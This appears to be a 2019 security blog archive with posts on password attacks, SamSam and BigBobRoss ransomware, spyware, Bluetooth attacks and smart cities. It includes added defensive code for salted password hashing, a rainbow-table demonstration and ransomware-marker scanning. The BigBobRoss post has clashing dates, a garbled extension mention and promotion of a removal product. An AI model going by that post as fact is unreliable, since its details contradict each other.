If cyber-criminals manage to steal users' passwords, they can use them to gain unauthorised access to the victims' accounts and perform other malicious activities. For example, let's say that a hacker manages to steal the username and password of a victim's online bank account by some method. The attacker can then use the stolen password to log in to the victim's online bank account and use that opportunity to transfer money from the victim's account to their own or someone else's. In this way, by having the passwords of various victims, cyber-criminals can steal money from innocent people.

Another example of the impact password attacks can have is a hacker stealing the password for a social media website that a victim uses for personal things, such as chatting with their friends, posting photographs, etc. Adversaries can use the stolen password to log in to the victim's social media account, and once logged in, they can do a lot of damage to the reputation of the victim, or use the online chat feature to spread malware. Whatever the case, the impact of password attacks can be very high.

Some of the best practices for protecting your passwords from being stolen include never sharing your password with anyone else and creating strong, complex passwords. Passwords should never be shared with anyone else because that creates a risk of the password leaking. Strong and complex passwords can be created by using alphanumeric characters in uppercase, lowercase, or a mix of both, by using special characters such as an asterisk (*) or a pound symbol (#), etc., and by making the password sufficiently long. The longer and more complex a password is, the harder it is for an attacker to crack.

People can also try to remember their passwords, but this is limited by human memory, which is generally quite limited unless one practises improving it, but that is another story in itself. To overcome the limits of human memory, it is advised that people use password managers. Password managers store all passwords in a single place so that people do not have to remember them by themselves. Password managers also help in creating strong and complex passwords by using various combinations of characters, and they can create passwords of varying lengths. The options available for creating a password depend on the password manager being used; there are password managers that support passwords up to 128 characters long.

Multi-factor authentication should be used so that even if a threat actor steals a victim's password, they still cannot log in to the victim's account, as they would need another factor to be authenticated. The password policies used within organisations should also specify the duration for which a particular password is valid and after which it has to be changed. It is recommended that, instead of storing passwords directly, the hashes of the passwords be stored, and that the database in which they are stored be encrypted. Salting should be used to prevent password cracking using password attacks such as rainbow table attacks. A lot of people are in the habit of not changing the default passwords of the devices they buy, such as a router, and that can cause problems for them, as cyber-criminals can easily get hold of default passwords, scan the internet for devices still using them, and log in to those devices. After logging in, attackers can manipulate the security settings of the devices and use them for their own malicious purposes. Therefore, the default passwords of all devices should be changed as soon as the devices are first put into use.
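The salted-hash storage recommended above, as an added example that is not part of the original post: each user gets a random salt, so two users with the same password end up with different stored values and a single precomputed (rainbow) table cannot cover both, and the slow key-derivation iteration count raises the cost of each guess in a brute-force attack. It uses hashlib.pbkdf2_hmac from the Python standard library; the iteration count, salt size, storage format and the constructed users "alice" and "bob" are my own choices.

```python
"""Salted, slow password hashing instead of storing passwords directly."""
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple

ITERATIONS = 300_000   # chosen value: slow for a guesser, cheap for one login
SALT_BYTES = 16        # 128-bit random salt per user


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = ITERATIONS) -> str:
    """Return a self-describing record 'pbkdf2_sha256$iters$salt_hex$hash_hex'.

    Storing the salt and iteration count alongside the hash lets the
    verifier recompute exactly what was stored, and lets the iteration
    count be raised later without breaking older records.
    """
    if salt is None:
        salt = secrets.token_bytes(SALT_BYTES)   # fresh salt per user/password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    try:
        algo, iters, salt_hex, hash_hex = stored.split("$")
    except ValueError:
        return False                  # malformed record: never accept
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), int(iters))
    # compare_digest avoids leaking how many leading bytes matched.
    return hmac.compare_digest(candidate.hex(), hash_hex)


def needs_rehash(stored: str, minimum_iterations: int = ITERATIONS) -> bool:
    """True when a record was made with a weaker cost than current policy."""
    parts = stored.split("$")
    return len(parts) != 4 or int(parts[1]) < minimum_iterations


def salts_defeat_precomputation(password: str) -> bool:
    """Same password hashed twice gives two different stored hashes."""
    first = hash_password(password).split("$")[3]
    second = hash_password(password).split("$")[3]
    return first != second


def demo() -> Tuple[bool, bool, bool]:
    """Two constructed users who chose the same password."""
    users: Dict[str, str] = {}
    for name in ("alice", "bob"):
        users[name] = hash_password("Summer2019!")   # constructed credential
    alice_ok = verify_password("Summer2019!", users["alice"])
    alice_wrong = verify_password("summer2019!", users["alice"])
    distinct_records = users["alice"] != users["bob"]
    return alice_ok, alice_wrong, distinct_records


if __name__ == "__main__":
    print(hash_password("Summer2019!"))
    print(demo())
```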

As passwords are widely used and hackers usually try to steal victims' passwords first, it is essential to keep passwords out of the hands of cyber-criminals.

Read More

5

June, 2019

Still relying on passwords to protect your accounts?

We all have come to a stage at which we should realise that passwords have been our best friends who have helped us protect all our online accounts, local accounts on our personal computers, smartphones, and other assets that require a password for logging in. ...
However, we should also realise that passwords are not enough to prevent threat actors from accessing our accounts and systems. This blog discusses how adversaries use various types of password attacks to steal or guess user passwords and gain access to the victims' accounts, computer systems and other password protected digital assets.

Passwords are usually a string of characters that is used to protect an IT asset, such as an online account, from unauthorised access. Passwords can be alphanumeric, uppercase, lowercase and can also include special characters like an asterisk (*), percentage symbol (%), exclamation symbol (!), etc. In total, there are five factors of authentication, which are something you know, something you have, something you are, somewhere you are, and something you do. Passwords come under the something you know factor. Users generally use a username and password pair for accessing their accounts, and this credential pair is unique to them. Along with the usernames of the users, passwords are also stored in a database. They are either stored in plaintext, which is not recommended, or they are stored in an encrypted form.

Passwords can easily be cracked if they are weak, unencrypted, or if the hashes are not generated using techniques such as salting. One of the most common password attacks is the brute force attack, in which cyber-criminals use various sets of tools to crack victims' passwords. The attackers use the tools to test many different candidate passwords one by one to guess the right password, and when the right one is found, they use it together with the victim's username to log in to the victim's computer or any other account. Apart from using software tools to perform a brute force attack, threat actors can also use hardware tools, such as USB drives with an inbuilt computer chip that can perform keystroke injection attacks, which can be used for brute forcing passwords.

Another type of password attack is a dictionary attack. In this type of attack, adversaries use lists of common dictionary words as input to various tools to crack victims' passwords. The wordlists containing dictionary words also include many variations of those words, such as c00l instead of cool, $ky instead of sky, r@inb0W instead of rainbow, and so on. There are numerous dictionary wordlists available for free on the Internet today for anyone to use. Password guessing is another attack which, as its name suggests, involves simply guessing a victim's password. Attackers repeatedly try to guess the password using facts about the victim, such as their birth date, their spouse's birth date, the name of their pet, and things like that. They also use random words as passwords and enter them into the login fields to try to gain access to the victim's account.

Passwords can be stolen as well. This can be done by using malicious software, such as a keylogging malware, by using a network traffic sniffer, by performing shoulder surfing, dumpster diving or other methods. Another type of password attack is the birthday attack in which hackers exploit the vulnerabilities that are present in the hashing algorithms used to generate the hash values of the passwords.

Similar to using a wordlist for a dictionary attack, attackers can use rainbow tables for cracking passwords. The difference between these two types of attacks is that in a dictionary attack, actual dictionary words are used as input to verify a password, whereas in a rainbow table attack the attacker tries to match the hashes contained within a rainbow table to the ones that they have stolen from a victim's database. If a hash listed in the rainbow table matches one that is among the stolen hashes, then the attacker can simply look up the string related to that particular hash. This string is included within the rainbow table next to the hash to which it relates, and as there is a very low chance of two strings having the same hash value, the string to which the matched hash belongs would probably be the correct password for the victim's account.
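The two passages above (salting and encrypted storage in the password-protection post, and the rainbow-table lookup described here) share one mechanism, so here is one added example, not from the original posts, that shows both sides: an attacker's precomputed table recovers a password from an unsalted digest, while the same lookup against a salted PBKDF2 record finds nothing. The precomputed table is constructed inline from a few common words (including the "leet" variants the post mentions) and stands in for a real rainbow table; the scheme, iteration count and record format are this example's own choices.

```python
"""Salted password hashing versus a precomputed-hash lookup (added example).

Not from the original posts. The small precomputed table below is constructed
inline and stands in for the rainbow tables described above; the storage
scheme shown is PBKDF2-HMAC-SHA256 with a per-password random salt.
"""
import hashlib
import hmac
import os
from typing import Dict, Optional

PBKDF2_ITERATIONS = 200_000  # work factor: slows every guess an attacker makes

# Constructed stand-in for an attacker's precomputed table: unsalted SHA-256
# digests of common passwords, keyed by digest so a stolen digest can be looked
# up directly, which is all a rainbow table does at the end of the day.
COMMON_WORDS = ["password", "rainbow", "r@inb0W", "c00l", "$ky", "letmein"]
PRECOMPUTED: Dict[str, str] = {
    hashlib.sha256(w.encode()).hexdigest(): w for w in COMMON_WORDS
}


def unsalted_hash(password: str) -> str:
    """Weak scheme: the same password always produces the same digest."""
    return hashlib.sha256(password.encode()).hexdigest()


def lookup_unsalted(stolen_digest: str) -> Optional[str]:
    """Recover a password from a stolen unsalted digest by table lookup."""
    return PRECOMPUTED.get(stolen_digest)


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted scheme; returns a record of the form 'iterations$salt_hex$digest_hex'."""
    if salt is None:
        salt = os.urandom(16)  # fresh random salt for every stored password
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), salt, PBKDF2_ITERATIONS
    )
    return f"{PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute the digest with the stored salt and compare in constant time."""
    iterations, salt_hex, digest_hex = record.split("$")
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


def lookup_salted(record: str) -> Optional[str]:
    """The same table lookup against a salted record: the digest depends on a
    salt the table was never built with, so nothing matches and the attacker
    would have to rebuild the whole table for every single salt."""
    return PRECOMPUTED.get(record.split("$")[2])
```

Two users who choose the same password still get different records because their salts differ, so a match in one account's hash tells the attacker nothing about the other.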

Cyber-criminals can also use combinations of various password attacks to achieve their goal of cracking victims' passwords. Password attacks are very common, and a large number of security breaches begin with attackers cracking the passwords of either an employee of an organisation or someone else who has access to the company's network infrastructure.

Read More

4

June, 2019

Save me from SamSam

Ransomware attacks have been the reason for a significant number of security incidents and substantial financial losses for several organisations in the past few years. ...
Ransomware attacks are considered to be among the most dangerous cyber-attacks of all time, and there is a great need to protect critical systems against this type of attack. This blog discusses the countermeasures that can be taken and the mechanisms that can be put in place to fight the SamSam ransomware and prevent severe damage from occurring.

The SamSam ransomware was first discovered in the year 2015, and it is a type of encryption ransomware that encrypts the files and folders stored on a computer system it infects. The SamSam ransomware also displays a dialogue box instructing the victims to pay a ransom to the attackers in the form of Bitcoin (BTC) if they want to regain access to their files and folders. SamSam ransomware can be customised according to an attacker's needs. This customisability of the ransomware strain makes it a very attractive piece of malware for threat actors to use on their victims. The fact that the creators behind SamSam alter the code each time there is news about SamSam getting detected makes this ransomware a hard fish to catch. This is because even if the security companies manage to add signatures for the current version of SamSam, they would not be able to detect the latest version, as they would not have a signature for it.

The channels through which SamSam spreads are malicious emails, drive-by downloads, etc. For incidents in which an employee of an organisation unsuspectingly tries to download free software from an unknown and untrusted website, certain countermeasures can be taken. One such countermeasure is making use of Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) that take advantage of polymorphic code detection. Polymorphic code detection techniques are particularly helpful in detecting different versions of the same computer code being transmitted over the internet and into a target network. Such IDS and IPS would help protect the network and the systems attached to it from the various versions of the SamSam ransomware that exist in the wild or that may be created in the future, as these systems would be able to work out that the code actually performs the same function.

An example of a cyber-attack involving SamSam is the one that happened last year in which the target was a hospital in Indiana, USA. The hospital had to pay a ransom of about $55,000 to gain back access to its systems.

Another method that can be used to reduce the impact of SamSam attacks is to create backups of all the critical data present on the computer systems and, if feasible, to create multiple backups. As most of the systems are compromised by exploiting vulnerabilities in RDP, care should be taken that RDP is adequately secured if it is being used in the network. Also, the passwords used for RDP should be complex and strong so that attackers cannot easily crack them using brute-force attacks. The passwords for any other remote access services, such as VPN, should also be complex. Care should be taken that the JBoss, Microsoft IIS and FTP software used on workstations and servers is continuously patched. Users should be appropriately trained and made aware that they must be careful when opening an email attachment, and that they should only open an attachment if the source of the email is trusted. They should also be told not to download software from untrusted and unknown websites.

Users should only be given the least privilege, that is, as much as they need to complete their tasks. The reason for providing only the least privileges is that if the group behind the SamSam ransomware manages to compromise a particular system, they would not be able to access processes that require elevated privileges, and they would not be able to traverse vertically within the network. As an extra layer of security, antivirus, antimalware and other endpoint protection solutions should be used to prevent SamSam from infecting computer systems and spreading to other systems in the same network.

By March 2018, the crooks behind the SamSam ransomware had earned about $850,000 through ransom. If this does not awaken organisations to implement proper security controls to protect themselves against SamSam, then who knows what would. SamSam is a grave threat, which needs to be stopped immediately before more damage is caused. Hospitals should be the first ones to put security mechanisms against SamSam into immediate effect.

Read More

3

June, 2019

SamSam ransomware attack

It is 2019, and we are still fighting ransomware. It has been a long time since ransomware became one of the major cyber threats causing massive damage to its targets. ...
There are numerous strains of ransomware out in the wild, each one with different abilities from the others. Every new variant created by threat actors has been more dangerous than the previous one. This blog talks about a specific strain of ransomware called the SamSam ransomware and how adversaries use this malware to attack their victims and cause damage.

Ransomware is a type of malware that attackers can use to infect target computer systems. It can be spread via email attachments, fake drive-by downloads, or other online methods used to fool a victim into downloading the ransomware onto their computer system. Once the ransomware gets onto a target system, it starts to infect all the files and folders stored on that system. Generally, ransomware achieves this by encrypting all the files and folders stored on the system using various cryptographic algorithms. The attack does not just stop there. After encrypting all the files and folders, the ransomware displays a dialogue box carrying a message that asks for ransom money. In this way, the attackers threaten the victims that they will lose access to all their files and folders if they do not pay the ransom. However, even after paying the ransom, there is no guarantee that the victims will ever get access to their data back. The money given to the threat actors cannot even be traced, because the attackers cleverly ask for payment in Bitcoin or another untraceable cryptocurrency. This type of attack is performed using encryption ransomware.

SamSam is one of the several strains of ransomware that adversaries use to steal money from their victims and cause chaos. It is a type of encryption ransomware and is considered to be one of the most dangerous ransomware strains out there for healthcare organisations such as hospitals. SamSam ransomware is also known as Samas or SamsamCrypt. It was discovered in the year 2015, and many professionals believe that its creators lived somewhere in Europe. SamSam is a highly customisable ransomware that is privately developed according to the needs of the threat actors who want to use it. Frequent updates are also rolled out for the SamSam ransomware so that it can evade detection by antivirus software and other detection or prevention solutions. The creators of SamSam continuously look out for any incidents involving SamSam, and if they find that a security company has updated the signatures of its antivirus software to include the SamSam signatures, they immediately create a new version of SamSam and spread it across the internet so that the new version can infect targets, as its signatures will not yet be available in the antivirus.

SamSam mainly targets public facing servers and exploits the vulnerabilities present in JBoss, FTP, Microsoft IIS, Remote Desktop Protocol (RDP), and Virtual Private Network (VPN) access with the most exploited target being RDP. It exploits these vulnerabilities to compromise systems and get a firm hold inside the target network. SamSam then starts infecting the compromised systems and encrypts the files and folders present on the target systems. It then asks for payment from the victims in Bitcoin (BTC). The dialogue box that appears on the screen of the victims displays instructions for the victims to follow to get the private keys for decrypting their data. The message even says that the victims can pay up for a few systems to see the honesty of the cyber-criminals.

SamSam ransomware has been the reason for a large number of ransomware attacks since it was first discovered, and hence, there is a need to protect critical systems against this particular strain of ransomware.

Read More

13

May, 2019

Building A Smart City

First, there were smartphones, then smart houses. Now, the smart city is the next disruptive "smart" move. As work, life, and society become increasingly connected through the wide adoption of the Internet of Things (IoT) devices, ...
it is a natural progression to build smart cities that leverage tech to provide benefits such as convenience and efficiency.

What makes smart cities so interesting is that they're not necessarily just about technology. The city is the heart of an economy from which work, school, retail, entertainment, and social life pulsate. By connecting the city in new ways, it becomes smarter and more capable of responding quickly to the changing (and growing) needs of those living and working within its boundaries.

The evolution of smart cities also provides opportunities to address some of the key challenges faced by urban areas, such as making room for affordable housing, improving transportation systems, and leveraging available data to create safer neighborhoods and streets.

Naveen Rajdev, Chief Marketing Officer of Wipro Limited, a leading global information technology, consulting and business process services company, notes that there are two important points around which to frame your smart city planning. "You don't want to show the proverbial slip of your smart city, and you don't want to overwhelm your citizens with too much tech," says Rajdev. "Keep your city's technology autonomous and discreet and take advantage of the Internet of Things and AI to help you do it."

Building a smart city must hinge on one purpose. This purpose must then align with functionality and features that help citizens. Many cities have discovered that they should start with specific initiatives rather than attempting to transform an entire urban space into one large project. Building a smart city helps benchmark other cities. For example, through its Project Green Light program, Detroit has added "invisible" technology to enhance citizen safety.

The program evolved from a partnership between city officials, police, Comcast, and local businesses. Smart technology helps to unobtrusively monitor and discourage criminal activity. Businesses can install police-monitored cameras to track criminal activity. Businesses using the technology have experienced a 50 percent drop in violent crime. These include gas stations and convenience stores, which are often the targets of armed robbery.

Finally, funding is an inescapable component of building a smart city. Although funding may come from city coffers, the cost of such projects can quickly outstrip what is available. A Deloitte report on financing smart cities recommends fiscal incentives such as tax reductions and qualified infrastructure bonds focused on smart city requirements. Investment in the private sector can also reduce near-term costs, while performance-based revenue sharing approaches can encourage more investment money to be spent on smart city projects. Finally, federal, state, and local collaboration can generate more efficient implementation of large-scale projects in funding smart city initiatives.

Building a smart city requires careful planning and collaboration with numerous stakeholders, including the general public. There must be a purpose that frames each technology and program, and this purpose should be linked back to specific goals. These goals may include reducing energy consumption, improving driver safety, or lowering crime potential. As smart cities are a new phenomenon, there will be challenges and mistakes.

Not every city can follow the same smart city transformation blueprint. However, it helps to study other smart city initiatives to learn what works and what doesn't. From there, a city can develop a big-picture strategy and step-by-step projects linked to buy-in goals, budget, and stakeholders.

Read More

11

May, 2019

Are they spying on me?

Different types of malware exist out in the wild, among which some are very dangerous if used to attack a victim. ...
This blog talks about the spyware malware, which attackers can use to spy on their targets and also cause severe damage to the victims.

Let's take the example of Bob, who is the Chief Technology Officer at a company. Bob recently attended a company meeting in which all the executives, trustees and the board of directors were present. The meeting was about how the company plans on securing one of its hot sites that is located in another state within the country. The next day, Bob received an email message with an audio file attached to it. Wondering what it might be, Bob opened the attachment to listen to what the audio file contained, and he was shocked about the contents of the audio. The audio contained the full conversation that happened among everyone who attended the company meeting. Bob became a victim of a cyber-attack, which in turn, also made his company a victim as the information in the stolen conversation could be used to attack the company's hot site which was in discussion and cause damage to the company. This could also cause Bob's job to be in jeopardy as there has been a leakage of sensitive information about the company that he works for.

In this attack, the threat actor somehow installed a spyware malware onto Bob's phone and managed to record the meeting conversation via the microphone present on Bob's phone. A hot site is a backup site and is used if the operations of the company's main site are disrupted by a disaster. If the attackers compromise the hot site and then attack the main site and destroy the data, then the company could face a great deal of losses as their business operations would get disrupted due to the attack and they won't be able to serve their customers. So, this was a little glimpse of the impact that a company would have to face due to a spyware attack, the primary victim of which was an employee of the company.

Now, imagine spyware being used to infiltrate a government organisation. Attackers could install it on the devices owned by the personnel of the government organisation, or they could hack into the organisation's network and install it on the devices present within the network. The damage caused could be massive, and information about a specific country's critical infrastructure could be stolen. If there is a spyware attack on a defence organisation, then it could put the whole nation's security in danger, because if the attackers manage to steal information such as military secrets, weapon designs, tactical information or defensive plans, they could either use that information to orchestrate further attacks, or they could sell it to terrorist organisations or to another country, which could become the reason for other types of attacks. These attacks could include army raids by other countries, bomb explosions by terrorist groups, or physical attacks on critical government infrastructure, as the threat actors would know about all the defensive plans and the locations of the security personnel.

Spyware is a lethal type of malware that is used by a lot of cyber-criminals for causing damage to their targets, and this should raise a significant concern regarding the protective measures against spyware. This issue should also push the security community into creating security controls that can prevent spyware from infiltrating electronic devices causing mischief.

Read More

10

May, 2019

BigBobRoss Ransomware:

BigBobRoss Ransomware is an encryption ransomware trojan, a malware threat intended to compromise the victim's files in order to demand a payment from the victim. ...
Encryption ransomware trojans increasingly follow a well-known attack pattern: they lock the victim's files using strong encryption algorithms and demand a ransom payment in Bitcoin or another digital currency. The BigBobRoss ransomware was first found attacking computer users in early March.
While files hit by such attacks usually cannot be recovered, a decryption utility is currently available that can help users restore files affected by a BigBobRoss Ransomware attack. As with most programs of this type, it blocks access to the victim's data unless a lump sum is paid. This is a new variant of the ransomware (Avast decrypted the previous version, so the cyber criminals released BigBobRoss). BigBobRoss has two variants, each appending a different extension to encrypted files.

The virus was first detected in January. More recent activity shows, however, that other releases, like .djvu and .. ecryptedALL, have changed the first version of the program. Remember that the ransom should not be paid and the criminals should not be contacted, as this can result in loss of both information and money.
The BigBobRoss ransomware has been called by different names because, unlike other developers who brand their products, its authors did not. The name BigBobRoss was derived from an e-mail address in the ransom message and from the file marker.

How the BigBobRoss Ransomware infects a computer:

Threats such as BigBobRoss Ransomware encrypt victims' files and delete System Restore Points, Shadow Volume Copies and other data that computer users could use to restore their data after an attack. BigBobRoss Ransomware and similar threats spread to computer users mainly through corrupted spam e-mail attachments and social engineering, by which users are tricked into downloading files that use unsafe scripts to install threats such as BigBobRoss Ransomware.
After BigBobRoss Ransomware is installed, it works in the background, scans the victim's computer for user-generated files, and encrypts them with a strong encryption algorithm.

Threats like BigBobRoss Ransomware target a wide variety of file types, including files with the following extensions:
.jpg, .jpeg, .raw, .tif, .gif, .png, .bmp, .3dm, .max, .accdb, .db, .dbf, .mdb, .pdb, .sql, .dwg, .dxf, .cpp, .cs, .h, .php, .asp, .rb, .java, .jar, .class, .py, .js, .aaf, .aep, .aepx, .plb, .prel, .prproj, .aet, .ppj, .psd, .indd, .indl, .indt, .indb, .inx, .idml, .pmd, .xqx, .xqx, .ai, .eps, .ps, .svg, .swf, .fla, .as3, .as, .txt, .doc, .dot, .docx, .docm, .dotx, .dotm, .docb, .rtf, .wpd, .wps, .msg, .pdf, .xls, .xlt, .xlm, .xlsx, .xlsm, .xltx, .xltm, .xlsb, .xla, .xlam, .xll, .xlw, .ppt, .pot, .pps, .pptx, .pptm, .potx, .potm, .ppam, .ppsx, .ppsm, .sldx, .sldm, .wav, .mp3, .aif, .iff, .m3u, .m4u, .mid, .mpa, .wma, .ra, .avi, .mov, .mp4, .3gp, .mpeg, .3g2, .asf, .asx, .flv, .mpg, .wmv, .vob, .m3u8, .dat, .csv, .efx, .sdf, .vcf, .xml, .ses, .qbw, .qbb, .qbm, .qbi, .qbr, .cnt, .des, .v30, .qbo, .ini, .lgb, .qwc, .qbp, .aif, .qba, .tlg, .qbx, .qby, .1pa, .qpd, .txt, .set, .iif, .nd, .rtp, .tlg, .wav, .qsm, .qss, .qst, .fx0, .fx1, .mx0, .fpx, .fxr, .fim, .ptb, .ai, .pfb, .cgn, .vsd, .cdr, .cmx, .cpt, .csl, .cur, .des, .dsf, .ds4, .drw, .eps, .ps, .prn, .gif, .pcd, .pct, .pcx, .plt, .rif, .svg, .swf, .tga, .tiff, .psp, .ttf, .wpd, .wpg, .wi, .raw, .wmf, .txt, .cal, .cpx, .shw, .clk, .cdx, .cdt, .fpx, .fmv, .img, .gem, .xcf, .pic, .mac, .met, .pp4, .pp5, .ppf, .nap, .pat, .ps, .prn, .sct, .vsd, .wk3, .wk4, .xpm, .zip, .rar.

BigBobRoss Ransomware makes the compromised files easy to recognise, since it appends the ".obsfucated" extension to the end of each file's name. BigBobRoss Ransomware drops its ransom note as a text file named 'Read Me.txt', which instructs the victim to contact the criminals by e-mail to obtain the decryption key. Contacting or paying the criminals responsible for BigBobRoss Ransomware allows them to continue profiting from ransomware and developing new malware threats.
The attackers try to trick people into opening these attachments by making their emails look official and legitimate. Upon opening the enclosed file, ransomware (or any other high-risk malware) is downloaded and installed. Trojans only cause computer infections once they are installed; when installed, they download and install ransomware and other malicious programs. Tools that are frequently used for the free activation of paid software, rather than activating any program or operating system, download and install malicious software.
Various third-party downloaders may cause computer infections when software is downloaded from unofficial, free file hosting or download pages, or via Peer-to-Peer networks (torrent clients or eMule). Cyber criminals often present their malicious archives as legitimate; these install various infections when people download and open them. Unofficial software updaters often download and install viruses instead of fixing bugs or updating software. Sometimes infection occurs through the bugs and defects of outdated software.
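The two on-disk markers named above, the ".obsfucated" extension and the 'Read Me.txt' note, are enough to confirm which folders an infection touched once it has run. The sweep below is an added example, not from the original post or any vendor tool; the sample directory tree it scans is constructed inline for demonstration, and the function and field names are this example's own.

```python
"""Filesystem sweep for the BigBobRoss markers described above (added example).

Looks for the two indicators the post names: files renamed with the
".obsfucated" extension and the "Read Me.txt" ransom note. The sample tree
is constructed here for demonstration and contains no real data.
"""
import os
import tempfile
from pathlib import Path
from typing import Dict, List

ENCRYPTED_EXT = ".obsfucated"  # spelling as the malware writes it, per the post
RANSOM_NOTE = "Read Me.txt"


def scan_for_markers(root: str) -> Dict[str, List[str]]:
    """Walk `root` and collect the paths of encrypted files and ransom notes."""
    encrypted: List[str] = []
    notes: List[str] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if name.lower().endswith(ENCRYPTED_EXT):
                encrypted.append(full)
            elif name == RANSOM_NOTE:
                notes.append(full)
    return {"encrypted": sorted(encrypted), "notes": sorted(notes)}


def original_name(path: str) -> str:
    """'report.docx.obsfucated' -> 'report.docx', the name the victim knows it by."""
    if path.lower().endswith(ENCRYPTED_EXT):
        return path[: -len(ENCRYPTED_EXT)]
    return path


def infection_summary(root: str) -> Dict[str, int]:
    """Counts an incident responder would record before restoring from backup."""
    found = scan_for_markers(root)
    dirs_with_notes = {os.path.dirname(p) for p in found["notes"]}
    return {
        "encrypted_files": len(found["encrypted"]),
        "ransom_notes": len(found["notes"]),
        "directories_with_notes": len(dirs_with_notes),
    }


def build_sample_tree(base: str) -> str:
    """Constructed sample: two affected folders and one untouched folder."""
    root = Path(base)
    docs = root / "Documents"
    docs.mkdir(parents=True)
    (docs / "report.docx.obsfucated").write_bytes(b"\x00" * 32)
    (docs / "budget.xlsx.obsfucated").write_bytes(b"\x00" * 32)
    (docs / RANSOM_NOTE).write_text("constructed ransom note text")
    pics = root / "Pictures"
    pics.mkdir()
    (pics / "holiday.jpg.obsfucated").write_bytes(b"\x00" * 32)
    (pics / RANSOM_NOTE).write_text("constructed ransom note text")
    clean = root / "Clean"
    clean.mkdir()
    (clean / "notes.txt").write_text("untouched")
    return str(root)


def demo() -> Dict[str, int]:
    """Build the constructed tree in a temp directory and summarise it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return infection_summary(tmp)


if __name__ == "__main__":
    print(demo())
```

Run against a mounted image of an affected host rather than the live system, so the sweep itself does not alter timestamps that forensic review may need.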

How To Protect Yourself from BigBobRoss Ransomware:

If a received e-mail is of no relevance and contains an attached file, it should be ignored. Do not open attachments or web links unless you are confident that they are safe. Direct links and official websites are the safest way to download software. None of the tools or sources mentioned in the paragraph above should be trusted, as they are often used to spread various rogue applications that can lead to computer infections.
Installed software should be updated only with official tools or functions provided by the software developer. Software cracking tools are illegal and are a cause of computer infections; you ought not to use them. Protect your computer against different threats by having well-known antivirus / anti-spyware software installed and activated at all times. We recommend using the Scan with Spyhunter for Windows to remove this ransomware if your computer is already infected with BigBobRoss.

Instant Automatic Removal of BigBobRoss Ransomware:

Manual removal of threats can be a long and complicated process requiring advanced computer skills. Spyhunter is an automated professional malware removal tool recommended for removing the BigBobRoss virus.
Windows XP and 7 users: Start your computer in Safe Mode. Click Start, click Shut Down, click Restart, click OK. During the computer's start-up process, press the F8 key on your keyboard repeatedly until the Windows Advanced Options menu appears, then select Safe Mode with Networking.
Windows 8 users: Start Windows 8 in Safe Mode with Networking. Go to the Windows 8 Start Screen, type Advanced, and select Settings in the search results. Click Advanced startup options, then in the opened "General PC Settings" window select Advanced startup. Click the "Restart now" button. Your computer will now restart into the "Advanced Startup options menu". Click the "Troubleshoot" button, then click the "Advanced options" button. In the advanced options screen, click "Startup settings".
Click the "Restart" button. Your PC will restart into the Startup Settings screen. Press F5 to boot in Safe Mode with Networking.
Windows 10 users: Click the Windows logo and select the Power icon. In the opened menu, click "Restart" while holding "Shift" on your keyboard. In the "Choose an option" window, click "Advanced options". In the Advanced options menu, select "Startup Settings" and click "Restart". In the following window, press "F5" on your keyboard. This restarts your system in Safe Mode with Networking.

Read More

09

May, 2019

How secure is my Bluetooth device?

Bob: Hey! What song are you listening to?
Alice: It's Demiurge by Meshuggah.
Bob: Could you share it with me?
Alice: Yes. Sure, turn on your Bluetooth.
...
Alice: Here you go.
Bob: Thank you! Let me play it on my phone. Nice!
Alice: You are welcome. Enjoy!
(Bob forgets to turn his phone’s Bluetooth off and gets on a metro train)
The next thing he sees on his phone after getting off the metro train is that all his data has been wiped. He gets his phone checked and finds out that someone used Bluetooth to connect to his device and wiped all his data. Now the attacker could have also, first, stolen important data from his phone and they may have then erased it. In any case, Bob became a victim of a cyber-attack that used the Bluetooth technology on Bob's phone to cause damage. This blog discusses the various ways Bluetooth technology present in different types of devices can be used by threat actors to orchestrate multiple types of Bluetooth attacks and cause damage to their target victims.

Bluetooth is a technology that has been around for more than 20 years now, and the first ever consumer targeted Bluetooth-based device was launched in the year 1999. Bluetooth is a technology that is usually used for transmitting and receiving data over a short distance wirelessly. It uses Ultra High Frequency radio signals in the 2.4 GHz to 2.485 GHz radio bands. Personal Area Networks (PANs) can be easily created using Bluetooth technology. Usually, 7 devices can be connected to a single device via Bluetooth. The devices that connect to each other can both interchangeably act as the master device, which is the device that sends commands, and as the slave device, which receives the commands. Nowadays, almost all smartphones, tablets, desktops and laptops have Bluetooth that people can use for sharing data with others. However, Bluetooth technology is not entirely safe to use, and it can be dangerous to have it on your device. There are several different types of attacks that are possible using Bluetooth technology.

An example of a significant Bluetooth vulnerability is the BlueBorne vulnerability. This vulnerability poses a risk to the security of several operating systems used on desktop, IoT and mobile platforms, and it has affected billions of devices that have Bluetooth technology built into them. By taking advantage of this serious vulnerability, adversaries can perform attacks that could allow them to gain complete access to and control over victims' devices. The attacker does not even have to pair the attacking device with the victim's device, which makes this attack even more severe. Attackers can steal confidential and other sensitive data from the target devices, and they could also perform other malicious activities, such as a Man-In-The-Middle attack or running malicious code on the target devices. Another type of Bluetooth attack is Bluesmack, which causes a Denial-of-Service of the Bluetooth service on a device. Various other kinds of attacks also exist, such as Bluebugging, Bluejacking, and Bluesnarfing. All of these attacks can be used either to take control of a device through Bluetooth or to steal sensitive data from it.

Hence, Bluetooth technology should be used with caution as the attacks that are possible via this attack vector are numerous. This should raise a concern among the community and measures should be taken to secure this technology and its implementation.

08

May, 2019

Starting Hardware for ML (Machine Learning) and hiring HR

